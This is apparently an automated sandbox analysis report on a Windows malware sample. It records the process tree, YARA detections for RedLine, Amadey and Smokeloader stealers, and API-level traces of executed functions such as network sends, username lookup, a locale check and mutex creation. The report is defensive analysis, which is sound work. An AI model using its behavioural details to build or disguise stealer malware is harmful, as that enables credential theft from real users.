Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:19:02
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 884
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:19:03
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1028
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:19:04
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1092
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:19:05
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1136
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:19:06
Start date:	27/08/2024
Path:	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe"
Imagebase:	0x400000
File size:	408'576 bytes
MD5 hash:	5886235E78709BA971A3B4CDFDC336EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.4556167209.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000003.2335941103.0000000000970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	08:19:07
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1184
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:19:16
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 560
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:19:17
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 568
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	08:19:17
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 580
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	08:19:18
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 772
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	08:19:19
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 780
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	08:19:20
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 780
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	26.3%
Total number of Nodes:	653
Total number of Limit Nodes:	19

Executed Functions

Function 0040A879 Relevance: 50.5, APIs: 24, Strings: 4, Instructions: 1503COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000,92861014,00000000), ref: 0040A87C

Strings

hT2F, xrefs: 0040A90E
VUUU, xrefs: 0040ADF2
@3P, xrefs: 0040B791
ht3F, xrefs: 0040A8EB

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CurrentDirectory
String ID: @3P$VUUU$hT2F$ht3F
API String ID: 1611563598-2132849557
Opcode ID: 2602ddab6eac9a4f89eeb84e895370196dcc8370ad6d4116b58109809860d8e9
Instruction ID: 52b64af73241539413c4a1800a5f12adbae5fb97357960d5a15e2002b8752e6e
Opcode Fuzzy Hash: 2602ddab6eac9a4f89eeb84e895370196dcc8370ad6d4116b58109809860d8e9
Instruction Fuzzy Hash: C1C2E471A002089FDB18DF68CD89BDDB775EF45308F1081ADE409A72D1DB79AA84CF99

Function 00409870 Relevance: 24.7, APIs: 16, Instructions: 668
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004089A0: GetTempPathA.KERNEL32(00000104,?,92861014,?,00000000), ref: 004089E7

GetFileAttributesA.KERNEL32(00000000), ref: 004098E3

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AttributesFilePathTemp
String ID:
API String ID: 3199926297-0
Opcode ID: 8f84b0408948437773d4c9191b9c1d629521ddc751bba1fc6d057d7759b00dd5
Instruction ID: 5cd7f40fb0e861bafd7a2a5b6705e02c86f1fec4f684e9ffbc3eb8c4fc29907c
Opcode Fuzzy Hash: 8f84b0408948437773d4c9191b9c1d629521ddc751bba1fc6d057d7759b00dd5
Instruction Fuzzy Hash: 5542C770900248DBEF14EBB8C6497DE7BB1AB06314F64426AD410773C3D7BD5E858BAA

Function 00407C40 Relevance: 7.9, APIs: 5, Instructions: 388
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,92861014), ref: 00407CBA
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407D1B
GetProcAddress.KERNEL32(00000000), ref: 00407D22
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407DE3
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407DE7

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID:
API String ID: 374719553-0
Opcode ID: f7f6e8e67db78b47d848f771e70a97d335489a4e24a8c3d9d3fc066140dee37e
Instruction ID: 10caa358f2aa1557ac9ec519d96e2c9e1a3c6fed02cc3ae2ee5dea5c244ef8c3
Opcode Fuzzy Hash: f7f6e8e67db78b47d848f771e70a97d335489a4e24a8c3d9d3fc066140dee37e
Instruction Fuzzy Hash: 76D13A70E00604A7DB14BB28DD4A39E7A71AF81314F5442AEE4457B3C2EB785E858BCB

Function 004364CB Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,004364CA,?,?,?,?,?,0043751E), ref: 004364ED
TerminateProcess.KERNEL32(00000000,?,004364CA,?,?,?,?,?,0043751E), ref: 004364F4
ExitProcess.KERNEL32 ref: 00436506

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
Instruction ID: 0421752cf44f8d4443f36d820e827d451acb6af861d804908af0f6746f18d030
Opcode Fuzzy Hash: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
Instruction Fuzzy Hash: 62E04635000649BBCB116F14DD0C94A3B28EB18746F058029F8068A232CB3AED82CB89

Function 00784506 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0078452E
Module32First.KERNEL32(00000000,00000224), ref: 0078454E

Memory Dump Source

Source File: 00000000.00000002.2286201427.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2a29365bfa13c7d754b93a60b1ff9c6d607f5ca5f8994b2e2a44aac70d2c626b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 0FF0C2311403126BD7203AF8988DB6E76E8AF48321F100129E642D20C0DAB8ED458B61

Function 0040B010 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0040B05D

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 0dcc3ed44c80f8f03620e70d93cbb8dcb6ddf6fac526140ef91d3ffd2fc3e669
Instruction ID: 5aff6c6eb21acf3f45e4eec7abfca20d1c92ed03c693ae01df62861b112d566b
Opcode Fuzzy Hash: 0dcc3ed44c80f8f03620e70d93cbb8dcb6ddf6fac526140ef91d3ffd2fc3e669
Instruction Fuzzy Hash: 0F211AB181015C9BDB2ACF14CD65BEAB7B8EB09704F0042DDA50663181DB745B88CFA4

Function 00405B20 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 0040600A
Keyboard Layout\Preload, xrefs: 00405F64
0000043f, xrefs: 0040603B
00000419, xrefs: 00405FA8
00000422, xrefs: 00405FD9

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 21c7d137ca04b858e29869740a0002f6f1955041e216059e4051c19ab265d2a4
Instruction ID: 5ad0620fed9ae8527844d18821adc0c7690aad8416e01c85c6c6a59ba11d14d8
Opcode Fuzzy Hash: 21c7d137ca04b858e29869740a0002f6f1955041e216059e4051c19ab265d2a4
Instruction Fuzzy Hash: 6EF1C17090024CAFEB24DF54CD84BDEBBB9EB45304F5041AEE509A72C1DB789A84CF99

Function 004419EC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004416A5: CreateFileW.KERNELBASE(00000000,00000000,?,00441A95,?,?,00000000,?,00441A95,00000000,0000000C), ref: 004416C2

GetLastError.KERNEL32 ref: 00441B00
__dosmaperr.LIBCMT ref: 00441B07
GetFileType.KERNELBASE(00000000), ref: 00441B13
GetLastError.KERNEL32 ref: 00441B1D
__dosmaperr.LIBCMT ref: 00441B26
CloseHandle.KERNEL32(00000000), ref: 00441B46
CloseHandle.KERNEL32(0043ABC2), ref: 00441C93
GetLastError.KERNEL32 ref: 00441CC5
__dosmaperr.LIBCMT ref: 00441CCC

Strings

H, xrefs: 00441C51

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 8b05721e769482de2a4d5e7d6a4ca8dc6cdf562e9062a651698a40d604ca663b
Instruction ID: 475bf89fd6f4a7ed3591cf81f8f591d738e8e5a3b7ee942fe7c2411ea530cd08
Opcode Fuzzy Hash: 8b05721e769482de2a4d5e7d6a4ca8dc6cdf562e9062a651698a40d604ca663b
Instruction Fuzzy Hash: ECA15A72A141448FEF19DF78DC517AE3BA1EB0A324F14015EE811AF3A1D7389C52CB9A

Function 0040D5EC Relevance: 13.9, APIs: 9, Instructions: 446
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D763
CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 0040D87F
send.WS2_32(?,?,00000004,00000000), ref: 0040DA7E
send.WS2_32(?,?,00000008,00000000), ref: 0040DABA

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: send$CreateDirectoryFileModuleName
String ID:
API String ID: 2319890793-0
Opcode ID: 5401c4815920e4d35101dcbd1ae3ee37a90759902c289dd883b7f39bde40ac42
Instruction ID: 188d70c66a5f4be68fd7d33ef56c514815cfd09ecc4b1248871123dde444c40e
Opcode Fuzzy Hash: 5401c4815920e4d35101dcbd1ae3ee37a90759902c289dd883b7f39bde40ac42
Instruction Fuzzy Hash: A8F10471D002189BDB24DB68CD497DEB774AF45314F1042AEE809B72C2DB799EC8CB99

Function 0211003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0211024D

Strings

kernel32.dll, xrefs: 0211008F, 02110095
cess, xrefs: 0211018D

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 74c52d792651154b35292d0624a265a8ac5351d2dd942f5d0c11e8719098d6e9
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 95525874E01229DFDB64CF58C984BA8BBB1BF09304F1580E9E94DAB351DB30AA85CF14

Function 0040D91C Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf5a584e534b2a20d27b0ae9e84f6fd012aff171eedbc05eee082d0019b91d4
Instruction ID: 3ffda5f313ed89773272538984193e5290d1344f5b3b761a0ced67f39ba74bd5
Opcode Fuzzy Hash: aaf5a584e534b2a20d27b0ae9e84f6fd012aff171eedbc05eee082d0019b91d4
Instruction Fuzzy Hash: 0041E672E001145BDB18CBB8CC857AEB7B5AF89328F11477EE815F33D1EA3499448B98

Function 00416CD0 Relevance: 6.0, APIs: 4, Instructions: 37
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00409870: Sleep.KERNELBASE(00000064), ref: 0040A7D3
Part of subcall function 00409870: CreateMutexA.KERNELBASE(00000000,00000000,00463224), ref: 0040A7F1
Part of subcall function 00409870: GetLastError.KERNEL32 ref: 0040A7F9
Part of subcall function 00409870: GetLastError.KERNEL32 ref: 0040A80A

Part of subcall function 00405B20: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040608D

CreateThread.KERNEL32(00000000,00000000,Function_00016AD0,00000000,00000000,00000000), ref: 00416C96
CreateThread.KERNEL32(00000000,00000000,Function_00016B60,00000000,00000000,00000000), ref: 00416CA7
CreateThread.KERNEL32(00000000,00000000,Function_00016BF0,00000000,00000000,00000000), ref: 00416CB8
Sleep.KERNEL32(00007530), ref: 00416CC5

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Create$Thread$ErrorLastSleep$MutexOpen
String ID:
API String ID: 3966068485-0
Opcode ID: 30aadc198e94ba4c63568fdfabcec14110782b1442d63bd446ab3f4a797acdad
Instruction ID: df55d08362bcf096fff0de3a4be89024fb4cfd1db5ec3a3146fab47a76e5f0ce
Opcode Fuzzy Hash: 30aadc198e94ba4c63568fdfabcec14110782b1442d63bd446ab3f4a797acdad
Instruction Fuzzy Hash: 26F03235BE832871F23032A61C03F8A29188B04F65F31002BB3083E0D298D8B48086EF

Function 004076C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00407989

Strings

runas, xrefs: 00407213

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: d6d3392e598113637bad4ce4d24becc47839fddaa52d25b95f7b3073b49e5dbc
Instruction ID: 6455404e545e4aa5c90cee65737e6a07ce5c62a39e5782701aa00b5614a1f21d
Opcode Fuzzy Hash: d6d3392e598113637bad4ce4d24becc47839fddaa52d25b95f7b3073b49e5dbc
Instruction Fuzzy Hash: B9E16E71E14144ABEB08EB78CD4679DBB71DF45308F60816EF404A73C2DB7DAA44879A

Function 00402E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Mtx_destroy_in_situ.LIBCPMT ref: 00402E50

Part of subcall function 0041C601: GetModuleHandleW.KERNELBASE(?,?,00417AA6,00000010,?,?,?,?,?,?,?,?,004026C2,?,92861014), ref: 0041C61A

__Cnd_destroy_in_situ.LIBCPMT ref: 00402E59

Strings

@.@, xrefs: 00402E49

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situHandleModuleMtx_destroy_in_situ
String ID: @.@
API String ID: 2964185041-4060093550
Opcode ID: c9761e53ef2083964413f5c6f4a59b91eb14559c7162a8aa63fbe169d8a1cd94
Instruction ID: 92437f20d394b70629ca31ac71e462385dd6c65c1c36a3e0c470bf3752b8bbea
Opcode Fuzzy Hash: c9761e53ef2083964413f5c6f4a59b91eb14559c7162a8aa63fbe169d8a1cd94
Instruction Fuzzy Hash: 40E020B284130456C311AA948C05EC77BCC8F21305F00442FFD4493342E7B9959443D8

Function 0040C206 Relevance: 3.5, APIs: 2, Instructions: 532
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004179A0: __Cnd_destroy_in_situ.LIBCPMT ref: 00417A98
Part of subcall function 004179A0: __Mtx_destroy_in_situ.LIBCPMT ref: 00417AA1

Sleep.KERNEL32(000003E8), ref: 0040C659

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
String ID:
API String ID: 113500496-0
Opcode ID: ed755c0f3880e09d776bb7094ae72d73c5ace9ea2d5166f68ee461e4d8585b9b
Instruction ID: 34a36e3dc02b07342641b54f75ab93151557bd9996ff6a5caee895426462980b
Opcode Fuzzy Hash: ed755c0f3880e09d776bb7094ae72d73c5ace9ea2d5166f68ee461e4d8585b9b
Instruction Fuzzy Hash: 4512A171A10108DBDB04DF68CD85BDDBBB5EF49304F54822EE805A72D2D739AA84CB99

Function 02110E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02110223,?,?), ref: 02110E19
SetErrorMode.KERNELBASE(00000000,?,?,02110223,?,?), ref: 02110E1E

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f41980ae68ce685da741fb8abaf3e2b422b08bc76916466801f808e01ad358d5
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: C9D0123154512877DB002A95DC09BCD7B1CDF09B66F108021FB0DD9080C770954046E5

Function 0040CFA9 Relevance: 1.9, APIs: 1, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040CFB7

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: d676c21abaaa04b6ab3ea46f419c4b56d3fe969c19fe4f0178fdf9cf6dad1545
Instruction ID: ebe73616ebb68255358254b99fd01bfffc2a8820fdba71de47a609f650d4cb0c
Opcode Fuzzy Hash: d676c21abaaa04b6ab3ea46f419c4b56d3fe969c19fe4f0178fdf9cf6dad1545
Instruction Fuzzy Hash: D1E12971E002449BEB19DB68CD457DDBB71AF46308F1081DEE4086B3C2DB799BC98B96

Function 0040D520 Relevance: 1.7, APIs: 1, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7920a06f2921a7a6d639081072423a25f7cc249e2c79eb8e3264dc7d58eea448
Instruction ID: ee74135e32cc5cf7af0490ce8cac848473a08bec86fdea98d41a75ad6b56be17
Opcode Fuzzy Hash: 7920a06f2921a7a6d639081072423a25f7cc249e2c79eb8e3264dc7d58eea448
Instruction Fuzzy Hash: 9A51CE70D042589BEB24DB68CD88BDEBBB1AB49304F5041EAD44877282DB795FC8CF95

Function 0040C740 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: accb126451aa060780395980f41b3b3b737be543a786ab1eee715968a8ff331a
Instruction ID: 8544734eade3a6289bf6c2d1f5f49ea40e0fc4ecad1aadae6103c469dd6da953
